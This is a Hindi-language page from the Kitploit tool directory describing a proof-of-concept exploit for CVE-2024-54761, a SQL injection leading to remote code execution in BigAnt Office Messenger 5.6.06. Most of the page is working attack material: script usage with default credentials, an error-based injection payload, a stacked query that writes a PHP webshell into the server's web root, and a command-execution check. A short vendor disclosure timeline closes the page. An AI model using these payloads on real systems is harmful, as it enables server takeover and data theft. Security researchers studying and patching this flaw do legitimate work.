Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-54761 — CVE-2024-54761 PoC | Kitploit
उपकरण/GitHubGitHub/nscan9/cve-2024-54761
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubnscan9/cve-2024-54761

CVE-2024-54761

CVE-2024-54761 PoC

रिपॉजिटरी देखें
111 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

BigAnt Office Messenger 5.6.06 में SQL इंजेक्शन के माध्यम से RCE

BigAnt Messenger में SQL इंजेक्शन भेद्यता RCE भेद्यता का कारण बनती है। शोषण करने के लिए चरणों का पालन करें।

उपयोग:

root@kitploit:~
CVE-2024-54761.py [-h] -r RHOST [-p RPORT] [-u USERNAME] [-P PASSWORD]
options:
  -h, --help            show this help message and exit
  -r, --rhost RHOST     Target IP address
  -p, --rport RPORT     Target port (default 8000)
  -u, --username USERNAME
                        Login username (default admin)
  -P, --password PASSWORD
                        Login password (default 123456)

डिफ़ॉल्ट क्रेडेंशियल के लिए शोषण चलाएं।

root@kitploit:~
python CVE-2024-54761.py -r 127.0.0.1
शोषण

मैन्युअल शोषण

dev_code पैरामीटर के साथ उपयोग किए गए डेटाबेस संस्करण को निकालें जो SQLi के लिए उजागर है।

root@kitploit:~
# Payload
?dev_code=AND EXTARCTVALUE(rand(),concat(CHAR(126),version(),CHAR(126)))--

SQLI संस्करण SQL स्टैक क्वेरी का उपयोग करके लक्ष्य पर php वेबशेल अपलोड करें।

root@kitploit:~
# Payload
?dev_code=;SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE 'C:/Program Files (x86)/BigAntSoft/IM Console/im_webserver/htdocs/shell.php'-- -

वेबशेल बनाएं 1 कमांड निष्पादन का प्रमाण:

root@kitploit:~
/shell.php?cmd=whoami

whoami कमांड dir

समयरेखा

31-10-2024: विक्रेता को ईमेल के माध्यम से भेद्यताएं प्रस्तुत कीं

31-10-2024: विक्रेता को ईमेल किया, कोई प्रतिक्रिया नहीं

15-11-2024: विक्रेता को ईमेल किया, कोई प्रतिक्रिया नहीं

15-11-2024: CVE का अनुरोध किया

संदर्भ

https://gist.github.com/nscan9/a31982c90ab40a8e00373bf15efbf52a
https://www.bigantsoft.com

टूल डाउनलोड करें